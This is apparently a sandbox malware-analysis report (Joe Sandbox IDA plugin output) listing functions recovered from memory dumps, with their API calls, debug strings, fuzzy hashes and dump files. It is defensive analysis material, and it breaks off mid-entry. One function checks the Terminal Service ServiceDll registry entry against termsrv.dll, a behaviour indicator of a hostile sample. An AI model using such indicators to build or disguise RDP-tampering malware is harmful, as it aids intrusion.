Part of subcall function 00007FF6BFD699E2: fwrite.MSVCRT ref: 00007FF6BFD69A8E
Part of subcall function 00007FF6BFD699E2: fflush.MSVCRT ref: 00007FF6BFD69A9A

GetLastError.KERNEL32(?,?,00000000,0000013B444313D0,?,00007FF6BFD6941F), ref: 00007FF6BFD61666

Strings

[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FF6BFD6167D
module_get_proc, xrefs: 00007FF6BFD6164C, 00007FF6BFD61676
[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FF6BFD61653

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 0ad8ead994b4c2e9daff84b653723ad2f9de5381132992f99bfddf63ec3bb5bb
Instruction ID: f312f485be867969fbff4cc0341b326715e27ce0ffc04d39e2156c5850273a03
Opcode Fuzzy Hash: 0ad8ead994b4c2e9daff84b653723ad2f9de5381132992f99bfddf63ec3bb5bb
Instruction Fuzzy Hash: EBF0D195A0861351FA5147CDE8046A977116F44FC4F084332EE4C8B7B9EF2CE6468380

Function 00007FFE11501942 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28networkCOMMON

Download Yara Rule

APIs

shutdown.WS2_32 ref: 00007FFE11501950
WSAGetLastError.WS2_32 ref: 00007FFE11501979

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

[D] (%s) -> Done(sock=0x%llx), xrefs: 00007FFE11501965
sock_shutdown, xrefs: 00007FFE1150195E, 00007FFE11501990
[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d), xrefs: 00007FFE11501997

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteshutdown
String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d)$sock_shutdown
API String ID: 2143829457-932964775
Opcode ID: 466383becfd062a0ecea402f0b1aab744221932a4668393f1a420154d60cd8f2
Instruction ID: 47a24e5222d09fc9e34f1f7ed106c4fd58c5469b52d16ed35e10fd2b18f77c17
Opcode Fuzzy Hash: 466383becfd062a0ecea402f0b1aab744221932a4668393f1a420154d60cd8f2
Instruction Fuzzy Hash: 4BF0E261E0CD07D1E71167ABE8800BD3B1AAF04BB4F9456B6D80D821F0EF2CE686C301

Function 00007FFE115044A4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFE115044B2

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

GetLastError.KERNEL32 ref: 00007FFE115044DE

Strings

[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFE115044F1
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFE115044CD
module_load, xrefs: 00007FFE115044C6, 00007FFE115044EA

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: d72539995aeb001acb87d3728d13f0ca4a4ed8b00041739a3f313744b42f4501
Instruction ID: a7f7acb92336835b871f7f4c5201ac79471b2c5dab2bd741839a6ea03f65a8a6
Opcode Fuzzy Hash: d72539995aeb001acb87d3728d13f0ca4a4ed8b00041739a3f313744b42f4501
Instruction Fuzzy Hash: 40F0B850E0AE07C0FF529B9BA8414B82759AF0ABE8F8D04B4CC0E5A370FD2CA5868300

Function 00007FFE13307474 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFE13307482

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

GetLastError.KERNEL32 ref: 00007FFE133074AE

Strings

module_load, xrefs: 00007FFE13307496, 00007FFE133074BA
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFE1330749D
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFE133074C1

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: 3bc04daa1e4e890d7f808d105628d7d9c8af52c5097b626737678a73fd546634
Instruction ID: 74664bd6451398bf952fa7ceb8f7070089b1355893af37035285949523c13529
Opcode Fuzzy Hash: 3bc04daa1e4e890d7f808d105628d7d9c8af52c5097b626737678a73fd546634
Instruction Fuzzy Hash: 2EF05850E0AE07D8FD56975BB8454F816506F28BB0B4C09B2CC2C367B6FE2CA9868308

Function 00007FFE0EB41AA4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFE0EB41AB2

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

GetLastError.KERNEL32 ref: 00007FFE0EB41ADE

Strings

[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFE0EB41AF1
module_load, xrefs: 00007FFE0EB41AC6, 00007FFE0EB41AEA
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFE0EB41ACD

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: 0816c4c5aace0ee0c92104ebcd679995e601e5eb34cc43c6fa76a6c60365b11d
Instruction ID: fc2fc5445f7da2e2dace002e293ebd0084e4ba1f189d9783a6a7b632a76b8774
Opcode Fuzzy Hash: 0816c4c5aace0ee0c92104ebcd679995e601e5eb34cc43c6fa76a6c60365b11d
Instruction Fuzzy Hash: 28F05891F0AB4B50F9B59F5EE8505B023A0EF04B84F884531CD8C5B779FE2CA5868B00

Function 00007FFE0EBD9FF4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFE0EBDA002

Part of subcall function 00007FFE0EBD1292: fwrite.MSVCRT ref: 00007FFE0EBD133E
Part of subcall function 00007FFE0EBD1292: fflush.MSVCRT ref: 00007FFE0EBD134A

GetLastError.KERNEL32 ref: 00007FFE0EBDA02E

Strings

module_load, xrefs: 00007FFE0EBDA016, 00007FFE0EBDA03A
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFE0EBDA041
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFE0EBDA01D

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: d8c01a19b4c86732eb88897d784f6955c11f9519b64180bb0377644f81f5a94f
Instruction ID: b42a14ee731a479bd96a1635ef235d9ca49bfcba207d255aa726ac193a253406
Opcode Fuzzy Hash: d8c01a19b4c86732eb88897d784f6955c11f9519b64180bb0377644f81f5a94f
Instruction Fuzzy Hash: 09F05E10E4E61B95ED32AF6AB8504F022906F15B80F485532CDCD56379FD1CA586CB40

Function 00007FFE0EC02174 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFE0EC02182

Part of subcall function 00007FFE0EC02FD2: fwrite.MSVCRT ref: 00007FFE0EC0307E
Part of subcall function 00007FFE0EC02FD2: fflush.MSVCRT ref: 00007FFE0EC0308A

GetLastError.KERNEL32 ref: 00007FFE0EC021AE

Strings

module_load, xrefs: 00007FFE0EC02196, 00007FFE0EC021BA
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFE0EC021C1
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFE0EC0219D

Memory Dump Source

Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true

Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: b4151e89cc68ab8922232e954921d4160c28e21012f4ccf8fb881e6c53f3d0ac
Instruction ID: 3dbf31d6739dd06ff57ee898a01d26e60cd3c33657ce7bf9af8cb88d11d6d533
Opcode Fuzzy Hash: b4151e89cc68ab8922232e954921d4160c28e21012f4ccf8fb881e6c53f3d0ac
Instruction Fuzzy Hash: D8F0E214E0E6D770FD499796BCC44B412005F1ABC0F8804B0DC8C57772ED2EA9829302

Function 00007FFE0E16CF94 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFE0E16CFA2

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

GetLastError.KERNEL32 ref: 00007FFE0E16CFCE

Strings

[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFE0E16CFBD
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFE0E16CFE1
module_load, xrefs: 00007FFE0E16CFB6, 00007FFE0E16CFDA

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: 646d57b541b335a283eea89aabbd0e98fb64b2e9af168f0a9fdd3a4f1d6bc300
Instruction ID: f5871e40deb10dbc477549004d6c6ae5c4c4a0c635c2cb6dea56ed053009dee0
Opcode Fuzzy Hash: 646d57b541b335a283eea89aabbd0e98fb64b2e9af168f0a9fdd3a4f1d6bc300
Instruction Fuzzy Hash: 79F08260F0FA1750FE529B5AA8405F423606F88FC0F595873DCCD57B76ED1CA5898340

Function 00007FFE115019A5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26networkCOMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 00007FFE115019C6
WSAGetLastError.WS2_32 ref: 00007FFE115019E9

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

[D] (%s) -> Done(sock=0x%llx), xrefs: 00007FFE115019DB
sock_close, xrefs: 00007FFE115019D4, 00007FFE115019F5
[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE115019FC

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastclosesocketfflushfwrite
String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
API String ID: 152032778-2221966578
Opcode ID: 81a7abb9ff0da566b5bc1c2cc99b804e0a5bb58d239e64a05326a2431c000775
Instruction ID: d7fe847428256e112764294aeac30120286d7c0e61db8919f4b719d232576d5e
Opcode Fuzzy Hash: 81a7abb9ff0da566b5bc1c2cc99b804e0a5bb58d239e64a05326a2431c000775
Instruction Fuzzy Hash: 2DF03A90E08D0381EB11A7E7E9C10BC365EAF54BB4F5417B5D53E461F2AF6CE5868302

Function 00007FFE0EB45AC0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 50stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE0EB42472: RegOpenKeyExA.ADVAPI32 ref: 00007FFE0EB424CC

strlen.MSVCRT ref: 00007FFE0EB45B12
strcmp.MSVCRT ref: 00007FFE0EB45B6A

Strings

ServiceDll, xrefs: 00007FFE0EB45AE9
SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 00007FFE0EB45AF0
termsrv.dll, xrefs: 00007FFE0EB45B63

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Openstrcmpstrlen
String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$termsrv.dll
API String ID: 679246061-1413152910
Opcode ID: fcf01618166d6772e81f11eb3996559ca3f77ef975368beb83bea753555944a6
Instruction ID: a571f353aa3f2f5e48ea19dbf935d93756a9b9001fc3d9056103a16012d1f6a3
Opcode Fuzzy Hash: fcf01618166d6772e81f11eb3996559ca3f77ef975368beb83bea753555944a6
Instruction Fuzzy Hash: BF212CA2A1DB8792EA319F10A8913FA6354EB50315F800032E6DE465B5DF2CD649CA40

Function 00007FFE115018D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFE115018FF
WSAGetLastError.WS2_32 ref: 00007FFE1150191D

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

sock_set_blocking, xrefs: 00007FFE1150192D
[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE11501934

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: f8427a8a7679de89cbdc30ff2bcea82045dd5e485bc0249782d8f8000ba83129
Instruction ID: b679ebae72f2fa6d14ea12cf4e8aaf38f605cc54ac613b271515e8e486809a0b
Opcode Fuzzy Hash: f8427a8a7679de89cbdc30ff2bcea82045dd5e485bc0249782d8f8000ba83129
Instruction Fuzzy Hash: D4F09661F0C90286F31057ABB8401BD66A9AB847B4F148279EC2E837B4DF7CD9868702

Function 00007FFE133013F9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFE1330141F
WSAGetLastError.WS2_32 ref: 00007FFE1330143D

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE13301454
sock_set_blocking, xrefs: 00007FFE1330144D

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: bed407a83d51540a350cb8335cceb301b7c72c53630572f62c028a70d1901d82
Instruction ID: c93151614f0654d65c6c4737e76e66ec15da517d7736c47f000e6d7a3c32404b
Opcode Fuzzy Hash: bed407a83d51540a350cb8335cceb301b7c72c53630572f62c028a70d1901d82
Instruction Fuzzy Hash: 09F06265F089028AF351576BB8001A95160AFA47B4F908272ED3DA37B5DE7CD9868708

Function 00007FFE0EB44D89 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFE0EB44DAF
WSAGetLastError.WS2_32 ref: 00007FFE0EB44DCD

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

Strings

[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0EB44DE4
sock_set_blocking, xrefs: 00007FFE0EB44DDD

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: 491ca2efa7c855bf823389286f95842b7971bdf9ad15312334074ab60ee9df2f
Instruction ID: b863847fb005974a83a2e0bffbd140d00f9f0b9058f3cc7cfceae45471eb5ec5
Opcode Fuzzy Hash: 491ca2efa7c855bf823389286f95842b7971bdf9ad15312334074ab60ee9df2f
Instruction Fuzzy Hash: 31F068A1F0C64356F3345F69A8002B65660EB94754F148235DCAE937B4DE7C98568F01

Function 00007FFE0EBD2209 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFE0EBD222F
WSAGetLastError.WS2_32 ref: 00007FFE0EBD224D

Part of subcall function 00007FFE0EBD1292: fwrite.MSVCRT ref: 00007FFE0EBD133E
Part of subcall function 00007FFE0EBD1292: fflush.MSVCRT ref: 00007FFE0EBD134A

Strings

sock_set_blocking, xrefs: 00007FFE0EBD225D
[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0EBD2264

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: d3d6cafc339255e44dc4f8f813a1e45e8922b849a73ed3aff8649ef9906618f3
